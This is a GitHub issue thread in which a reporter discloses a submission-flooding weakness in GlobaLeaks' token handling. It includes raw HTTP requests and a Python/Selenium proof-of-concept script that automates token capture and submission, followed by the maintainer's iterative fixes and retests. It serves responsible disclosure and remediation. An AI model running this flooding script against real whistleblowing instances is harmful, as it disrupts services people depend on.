### ISSUE TITLE
An attacker is able to flood submissions

### ISSUE THREAD

**Issue by ikewzer0** [globaleaks/GlobaLeaks#2776] opened 2020-02-25 10:33 UTC
**Current behavior**
Due to the implementation of the token generation, an attacker can flood submissions. 
Visiting `https://xxx.try.globaleaks.org/#/submission` creates two requests, second having the answer in the PUT request and marking the response "solved":true"

first POST request:
```
---Request---
POST /token HTTP/1.1
Host: xxx.try.globaleaks.org

{"type":"submission"}

---Response---
HTTP/1.1 201 Created

{"id":"uwBm1S5SS4yQ8x155ZT44RuRsLVQnrHf46diQsDyVg","creation_date":"2020-02-25T08:15:02.791977Z","type":"submission","question":"czXEZjkR2TBQzpZfm3Jr","solved":false}
```
second PUT request:
```
---Request---
PUT /token/uwBm1S5SS4yQ8x155ZT44RuRsLVQnrHf46diQsDyVg HTTP/1.1
Host: xxx.try.globaleaks.org

{"id":"uwBm1S5SS4yQ8x155ZT44RuRsLVQnrHf46diQsDyVg","creation_date":"2020-02-25T08:15:02.791977Z","type":"submission","question":"czXEZjkR2TBQzpZfm3Jr","solved":false,"answer":208}

---Response---
HTTP/1.1 202 Accepted

{"id":"uwBm1S5SS4yQ8x155ZT44RuRsLVQnrHf46diQsDyVg","creation_date":"2020-02-25T08:15:02.791977Z","type":"submission","question":"czXEZjkR2TBQzpZfm3Jr","solved":true}
```

Since calling the `https://xxx.try.globaleaks.org/#/submission` page creates a valid token, this can be used to pass to the submisson page due to the only validity check being the parameter `'token_id'` which we got earlier.

```
PUT /submission/uwBm1S5SS4yQ8x155ZT44RuRsLVQnrHf46diQsDyVg HTTP/1.1
Host: xxx.try.globaleaks.org

{"context_id":"ae042b6d-e711-4d2f-bfb2-353a0d085193","receivers":["c112c15a-b289-4c71-8ba7-922bd32c1154"],"identity_provided":false,"answers":{"be986d48-d12a-4b6a-b92c-3f86bc12e53b":[{"required_status":false,"value":"1"}],"ae7317b8-19bf-4e00-926b-56cff86a7203":[{"required_status":false,"value":"1"}],"b5b119a9-2298-4c75-9e1a-0f6cc7172770":[{"required_status":false}]},"answer":0,"total_score":0,"removed_files":[],"token_id":"uwBm1S5SS4yQ8x155ZT44RuRsLVQnrHf46diQsDyVg"}
```
Below is a screenshot of how an attacker can use it for his leverage.
![Screenshot from 2020-02-25 14-07-45](https://user-images.githubusercontent.com/21004441/75231904-1a0f8a80-57d8-11ea-9ca7-69b64dba7ff0.png)

**Expected behavior**
- Implementing a validation session key to the header or a captcha before the submission can resolve this issue.
- Implement rate limitation

**Steps to reproduce the problem or feature illustration**
Below is a simple POC script to automate the process
```
import time, json, copy, requests
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from selenium.webdriver.chrome.options import Options
from selenium import webdriver

token = '1'
caps = copy.deepcopy(DesiredCapabilities.CHROME)
caps['goog:loggingPrefs'] = {'performance': 'ALL'}
driver_options = Options()
driver_options.add_argument("--headless")
driver = webdriver.Chrome(desired_capabilities=caps, options=driver_options)
driver.get('https://xxx.try.globaleaks.org')
time.sleep(1)
browser_log = driver.get_log('performance') 
for entry in browser_log:
	x = json.loads(entry['message'])['message']
	if ('url' in str(x)) and ("/token/" in str(x)) and ('Network.responseReceived' in str(x)):
		token = (x['params']['response']['url'])
		token = token.partition("token/")[2]

if len(token) > 1:
	url = "https://xxx.try.globaleaks.org/submission/"+str(token)
	headers = {"Connection": "close", "Accept": "application/json, text/plain, */*", "Sec-Fetch-Dest": "empty", "GL-Language": "en", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.100 Safari/537.36", "Content-Type": "application/json;charset=UTF-8", "Origin": "https://xxx.try.globaleaks.org", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "cors", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9"}
	json_req={"answer": 0, "answers": {"15ab2573-a2f9-4827-b870-63c4bb27a550": [{"value": "a8a93dc0-889e-4982-a265-9192b391f9d4"}], "1fa659bc-a3b6-4f74-bce4-96f3382d4a52": [{"value": "17df2ad5-717b-4472-8f07-1a5b0c4b9a09"}], "4043f238-6a66-4e94-9c89-bb6e47b3b4e3": [], "4cc7bb72-9665-4dca-a96c-1c2df20f2361": [{"db5fd5da-650a-489a-899c-39e754c0dd23": [], "e35c8e83-1709-49dc-9957-28d5faf91c04": []}], "62abe7c5-6f84-4d2a-a5c7-d8cd757a20a8": [{"2cb6dbdd-2a4d-4f19-908f-06f2c6e94d99": [], "431cdece-aa86-4bd5-9e31-188a3b852bed": [], "6cba81d9-c824-4c19-8c75-73df604db734": []}], "959e136f-2c68-475d-a5c6-30738119adbd": [], "96e08398-9606-4eb3-bb0b-8cbfa95b6d00": [{"value": "1"}]}, "context_id": "0ffc7359-d67b-49a3-9c0b-2acdb28526d8", "identity_provided": False, "receivers": ["8ab57516-35b6-42a7-bfe5-9105a0d85187", "25ff141e-3dd6-4317-b0d7-cb2140fa85f0", "cbcb1390-6db5-44cd-a7f4-ae6da41edb15"], "token_id": str(token), "total_score": 0}
	rr = requests.put(url, headers=headers, json=json_req, timeout=15)
	print (rr.text)
```

**What is the motivation or use case for changing the behavior?**
To stop an attacker from creating huge amount of submissions.

**GlobaLeaks version:**
Works on the latest version

**Comment by evilaliv3** [comment] 2020-02-25 10:57
Thank you for reporting this @ikewzer0.

Actually the token is intended to be unique.

Let me check it and i will be back to you.

**Comment by ikewzer0** [comment] 2020-02-25 10:58
i just saw u have a program on hackerone :( posted to it..

**Comment by evilaliv3** [comment] 2020-02-25 10:59
Sure! thank you anyway! Will triage on it as well

**Comment by ikewzer0** [comment] 2020-02-25 10:59
cool, thanks :) @evilaliv3

**Comment by evilaliv3** [comment] 2020-02-25 11:18
@ikewzer0, the issue should be fixed now.

If you would like to retest it in production you can already test it on try.globaleaks.org

Thank you so much!

**Comment by ikewzer0** [comment] 2020-02-25 11:31
when i try to submit, it's not getting posted in try.globaleaks.org. so i can't verify the fix..

**Comment by evilaliv3** [comment] 2020-02-25 11:41
Sorry @ikewzer0 , when applying the patch in production i added a typo. Would you please retry now?

**Comment by ikewzer0** [comment] 2020-02-25 11:47
Hi @evilaliv3 am getting this error 
"Error!
Internal server error (Unexpected)"

**Comment by evilaliv3** [comment] 2020-02-25 13:12
Mmmm; would you please retry now? Thank you!

**Comment by ikewzer0** [comment] 2020-02-25 13:58
yes :) it's a whole lot better.. I couldn't pretty much understood what u did, but as u can see i got only 4 successful from 20 spam requests.

![Screenshot from 2020-02-25 18-57-30](https://user-images.githubusercontent.com/21004441/75253582-a03fc700-5800-11ea-96a4-c9e6af6305af.png)

**Comment by evilaliv3** [comment] 2020-02-25 18:44
@ikewzer0: thank you; i've revised the fix based on your retesting.

Would you please test it again?

**Comment by ikewzer0** [comment] 2020-02-25 19:10
ur welcome.. i grabbed 40 tokens, and ran on the submit again.. i was able to achieve 8 valids

![Screenshot from 2020-02-26 00-10-10](https://user-images.githubusercontent.com/21004441/75278813-61276b00-582c-11ea-86b1-266c752cf9c5.png)

**Comment by ikewzer0** [comment] 2020-02-25 19:16
i believe if you put a random validation guid in the POST data, it can be stopped easily.

```
PUT /submission/VTdFUAkMKihM8uLDrEBZVIHzkoEFTEGAeTFJ90yaib HTTP/1.1
Host: xxx.try.globaleaks.org

{"context_id":"ae042b6d-e711-4d2f-bfb2-353a0d085193","receivers":["c112c15a-b289-4c71-8ba7-922bd32c1154"],"identity_provided":false,"answers":{"be986d48-d12a-4b6a-b92c-3f86bc12e53b":[{"required_status":false,"value":"1"}],"ae7317b8-19bf-4e00-926b-56cff86a7203":[{"required_status":false,"value":"1"}],"b5b119a9-2298-4c75-9e1a-0f6cc7172770":[{"required_status":false}]},"answer":0,"total_score":0,"removed_files":[],"token_id":"VTdFUAkMKihM8uLDrEBZVIHzkoEFTEGAeTFJ90yaib"}
```

only parameter an attacker has to change is the token_id.

**Comment by evilaliv3** [comment] 2020-02-25 20:26
@ikewzer0: Actually i do not understand the attack that you are doing here.

In your first post you were trying to do token reuse and this is what should be blocked now.

But now you are testing with different tokens; am i correct?

**Comment by evilaliv3** [comment] 2020-02-25 20:29
In your current tests you are getting 40 valid tokens, using them and and you get some 500 errors because of some query failure due to concurrency.

The test i would like you to try is to reuse the same token twice; this is what you described in your first post and that should now be blocked. Can you confirm this?

**Comment by ikewzer0** [comment] 2020-02-25 21:06
@evilaliv3 yes, the same token can't be used now, it totally blocks it.. but i am still able to flood using multiple tokens.

**Comment by ikewzer0** [comment] 2020-02-25 21:28
no, wait.. i can still use a used token id in the POST data..

check the token ID's used at parallel.try.globaleaks.org

am using the same token_id "a1RLAuREDk02hKfm2xUIeVxA0FBoqtyy67e4rLliUL" in POST data for the below submission URL's
https://parallel.try.globaleaks.org/submission/xIrD6GlmtBSECicLw0ap02SLGL1OxPg74m5S3et9T0
https://parallel.try.globaleaks.org/submission/C2SQCulUq08f80KxmMtSWTRXmwXb8emoXWhNo4lbGV
https://parallel.try.globaleaks.org/submission/bxBpXSRFS4pP24eMIRKGNY7Jp3MuMrh0llNYEX2e1w
https://parallel.try.globaleaks.org/submission/GdscenOCoxpmlnFMF22vNo8gF6b56jWjHGHczX4hXY

![simplescreenrecorder-2020-02-26_02 23 34](https://user-images.githubusercontent.com/21004441/75289231-a1dcaf80-583f-11ea-9a61-f03449f6dfd8.gif)

**Comment by evilaliv3** [comment] 2020-02-26 12:11
Also this should be fixed now @ikewzer0; When you can it would be helpful if you could retry.

thank you so much.

**Comment by ikewzer0** [comment] 2020-02-26 13:23
your welcome, gave a run.. i think it goes through still.

![Screenshot from 2020-02-26 18-23-51](https://user-images.githubusercontent.com/21004441/75348641-0d1c9500-58c5-11ea-933a-28084b3ec9a9.png)

**Comment by evilaliv3** [comment] 2020-02-26 15:33
Mmm this is actually very strange, ive the doupt to not have restarted the server on last update. Would you please retry now?

**Comment by ikewzer0** [comment] 2020-02-26 15:42
token_id is the same one i used for the previous run.. it didn't get expired either.. "n6GNkuHUxiQbN10K7xpd8zTcX9BKDWpliGTNiMV844"

![rr-2020-02-26_20 39](https://user-images.githubusercontent.com/21004441/75360985-6215d680-58d8-11ea-8e67-6efcd36575bc.gif)

**Comment by evilaliv3** [comment] 2020-02-26 16:39
I see, i guess that the issue is with python not being thread safe in relation to dictionaries.
I'm using a pop() from a dictionary but it seems that multhple threads find it available.

What about the other requests that are getting a 500? Are they using all the same token_id? this would confirm that anyhow the protection is effective limiting the spam. Do you confirm?

**Comment by evilaliv3** [comment] 2020-02-26 16:44
Ah! @ikewzer0 i understood it now!

You are replacing the token_id but actually that parameter inside the request is not used.
The token that is read is the one in the URL. So you are actually making requests using different tokens. This is why it is working.

Would you please retry changing the value in the URL?

**Comment by ikewzer0** [comment] 2020-02-26 16:52
> Ah! @ikewzer0 i understood it now!
> 
> You are replacing the token_id but actually that parameter inside the request is not used.
> The token that is read is the one in the URL. So you are actually making requests using different tokens. This is why it is working.
> 
> Would you please retry changing the value in the URL?

yes you are right. is it intended to work as so ? i mean the token_id in the POST body not getting expired and reusable.

**Comment by ikewzer0** [comment] 2020-02-26 16:52
@evilaliv3 let me know how u want to run it?

**Comment by evilaliv3** [comment] 2020-02-26 17:07
@ikewzer0: The token ID written inside the post body is a refusal of old code. I'm removing it.
The only token used by the application is the one within the URL.
That token should not be subject to a correct implementation of a single usage.

Would you retry using the same submission url for multiple requests and see what happens?

**Comment by ikewzer0** [comment] 2020-02-26 17:11
am on a game.. testing in few mins :)

**Comment by evilaliv3** [comment] 2020-02-26 17:12
Thank you so much for your support!

**Comment by ikewzer0** [comment] 2020-02-26 17:30
Hi @evilaliv3 , you mean like this ? it gives all 500

![test](https://user-images.githubusercontent.com/21004441/75370841-904ee280-58e7-11ea-92c1-b1c66932f80d.gif)

**Comment by evilaliv3** [comment] 2020-02-26 17:32
Exactyl! they should now return all that the token is invalid except the first. is it correct?

**Comment by evilaliv3** [comment] 2020-02-26 17:34
In your test i think you used an invalid token for each request. Try to get a valid token and use it in the URL for repeated requests.

**Comment by evilaliv3** [comment] 2020-02-26 17:36
This is what is logged on the server.
Basically in your previous tests you used an invalid token multiple times.
Try insted to get a token and reuse it multiple times. By the current implementation only the first request should succed.

```parallel.try.globaleaks.org [REMOVED_IP_ADDRESS] - - [26/Feb/2020:17:25:07 +0000] "PUT /token/VLIRNeXeErllbbrmrbQXiHmrH203lhmt0pNZdKVaY5 HTTP/2" 202 131 0ms - "[REMOVED_USER_AGENT]" 1862
parallel.try.globaleaks.org [REMOVED_IP_ADDRESS] - - [26/Feb/2020:17:25:07 +0000] "PUT /token/SmSVN7A4me1oEIhSlNHGPUsqHaplLwvcRdhEk1a94J HTTP/2" 202 131 1ms - "[REMOVED_USER_AGENT]" 1862
parallel.try.globaleaks.org [REMOVED_IP_ADDRESS] - - [26/Feb/2020:17:25:07 +0000] "PUT /token/Uj6pvM7ulPQeMDESIsStE0GmPvXXmuXXLTbLl7S77b HTTP/2" 202 131 2ms - "[REMOVED_USER_AGENT]" 1862
parallel.try.globaleaks.org [REMOVED_IP_ADDRESS] - - [26/Feb/2020:17:25:07 +0000] "PUT /token/bcrTbbE9hJ8BJxI4zYLVYfQBxNaO8275ceaFbxn6ZH HTTP/2" 202 131 1ms - "[REMOVED_USER_AGENT]" 1862
parallel.try.globaleaks.org [REMOVED_IP_ADDRESS] - - [26/Feb/2020:17:25:07 +0000] "PUT /token/FaENfVcGK2iNcRE91O6yXsjk0nv68ShBOg99zdRXK9 HTTP/2" 202 131 1ms - "[REMOVED_USER_AGENT]" 1862
parallel.try.globaleaks.org [REMOVED_IP_ADDRESS] - - [26/Feb/2020:17:25:08 +0000] "PUT /token/z46EKpTKl8H6fU9yB3YspMthvjESE14VOV17HhjTbX HTTP/2" 202 131 1ms - "[REMOVED_USER_AGENT]" 1862
parallel.try.globaleaks.org [REMOVED_IP_ADDRESS] - - [26/Feb/2020:17:25:08 +0000] "PUT /token/lJXa9CkCFbmJTVa8A9ky6SHIAswR433UqWqrRP2jj5 HTTP/2" 202 131 1ms - "[REMOVED_USER_AGENT]" 1862
parallel.try.globaleaks.org [REMOVED_IP_ADDRESS] - - [26/Feb/2020:17:25:42 +0000] "PUT /submission/pnqSCE58OMypcOL1sdCRpkXJwzrILPtBZzzmrY0xWI HTTP/1.1" 500 99 3ms - "[REMOVED_USER_AGENT]" 1862
parallel.try.globaleaks.org [REMOVED_IP_ADDRESS] - - [26/Feb/2020:17:25:42 +0000] "PUT /submission/pnqSCE58OMypcOL1sdCRpkXJwzrILPtBZzzmrY0xWI HTTP/1.1" 500 99 1ms - "[REMOVED_USER_AGENT]" 1862
parallel.try.globaleaks.org [REMOVED_IP_ADDRESS] - - [26/Feb/2020:17:25:42 +0000] "PUT /submission/pnqSCE58OMypcOL1sdCRpkXJwzrILPtBZzzmrY0xWI HTTP/1.1" 500 99 1ms - "[REMOVED_USER_AGENT]" 1862
parallel.try.globaleaks.org [REMOVED_IP_ADDRESS] - - [26/Feb/2020:17:25:42 +0000] "PUT /submission/pnqSCE58OMypcOL1sdCRpkXJwzrILPtBZzzmrY0xWI HTTP/1.1" 500 99 9ms - "[REMOVED_USER_AGENT]" 1862
parallel.try.globaleaks.org [REMOVED_IP_ADDRESS] - - [26/Feb/2020:17:25:42 +0000] "PUT /submission/pnqSCE58OMypcOL1sdCRpkXJwzrILPtBZzzmrY0xWI HTTP/1.1" 500 99 5ms - "[REMOVED_USER_AGENT]" 1862
parallel.try.globaleaks.org [REMOVED_IP_ADDRESS] - - [26/Feb/2020:17:25:43 +0000] "PUT /submission/pnqSCE58OMypcOL1sdCRpkXJwzrILPtBZzzmrY0xWI HTTP/1.1" 500 99 2ms - "[REMOVED_USER_AGENT]" 1862
parallel.try.globaleaks.org [REMOVED_IP_ADDRESS] - - [26/Feb/2020:17:25:43 +0000] "PUT /submission/pnqSCE58OMypcOL1sdCRpkXJwzrILPtBZzzmrY0xWI HTTP/1.1" 500 99 2ms - "[REMOVED_USER_AGENT]" 1862
parallel.try.globaleaks.org [REMOVED_IP_ADDRESS] - - [26/Feb/2020:17:25:43 +0000] "PUT /submission/pnqSCE58OMypcOL1sdCRpkXJwzrILPtBZzzmrY0xWI HTTP/1.1" 500 99 3ms - "[REMOVED_USER_AGENT]" 1862
parallel.try.globaleaks.org [REMOVED_IP_ADDRESS] - - [26/Feb/2020:17:25:43 +0000] "PUT /submission/pnqSCE58OMypcOL1sdCRpkXJwzrILPtBZzzmrY0xWI HTTP/1.1" 500 99 2ms - "[REMOVED_USER_AGENT]" 1862
parallel.try.globaleaks.org [REMOVED_IP_ADDRESS] - - [26/Feb/2020:17:25:43 +0000] "PUT /submission/pnqSCE58OMypcOL1sdCRpkXJwzrILPtBZzzmrY0xWI HTTP/1.1" 500 99 1ms - "[REMOVED_USER_AGENT]" 1862
parallel.try.globaleaks.org [REMOVED_IP_ADDRESS] - - [26/Feb/2020:17:25:43 +0000] "PUT /submission/pnqSCE58OMypcOL1sdCRpkXJwzrILPtBZzzmrY0xWI HTTP/1.1" 500 99 2ms - "[REMOVED_USER_AGENT]" 1862
parallel.try.globaleaks.org [REMOVED_IP_ADDRESS] - - [26/Feb/2020:17:25:44 +0000] "PUT /submission/pnqSCE58OMypcOL1sdCRpkXJwzrILPtBZzzmrY0xWI HTTP/1.1" 500 99 3ms - "[REMOVED_USER_AGENT]" 1862
parallel.try.globaleaks.org [REMOVED_IP_ADDRESS] - - [26/Feb/2020:17:25:44 +0000] "PUT /submission/pnqSCE58OMypcOL1sdCRpkXJwzrILPtBZzzmrY0xWI HTTP/1.1" 500 99 2ms - "[REMOVED_USER_AGENT]" 1862
parallel.try.globaleaks.org [REMOVED_IP_ADDRESS] - - [26/Feb/2020:17:25:44 +0000] "PUT /submission/pnqSCE58OMypcOL1sdCRpkXJwzrILPtBZzzmrY0xWI HTTP/1.1" 500 99 2ms - "[REMOVED_USER_AGENT]" 1862```

**Comment by ikewzer0** [comment] 2020-02-26 17:37
Exactly :)

![Screenshot from 2020-02-26 22-37-47](https://user-images.githubusercontent.com/21004441/75371455-91344400-58e8-11ea-9db2-4ae61889d24e.png)

**Comment by ikewzer0** [comment] 2020-02-26 17:41
One more thing, since an attacker can obtain a valid token doing a submit on the /#/submission.. he can use the token and submit since the answer is already solved. he can automate the process and flood. isn't this an issue too ?

**Comment by ikewzer0** [comment] 2020-02-26 17:52
there's an effective rate limitation .. no worries.. we can close this ..

**Comment by evilaliv3** [comment] 2020-02-26 18:10
Thank you so much! lookin forward to meet you somewhere to offer you some beer or stickers! :) thank you again @ikewzer0

**Comment by evilaliv3** [comment] 2020-02-26 18:15
@ikewzer0: i took the chance of reworking on this topic applying the same proof of work to login attempts.

Now during login of users and whistleblowers, the system will fetch a token, resolve the proof of work and enforce a delay of 1 second for accepting the use of the token. The code is already on the devel branch but will be released next week with GlobaLeaks 4.

**Closed** 2020-02-26 18:15 UTC

**Comment by ikewzer0** [comment] 2020-02-26 18:26
@evilaliv3 you're most welcome.. that 1 second delay did affect my python script's efficiency to brute. 
 a thanks in hackerone would be as good as a beer, lol :smile:
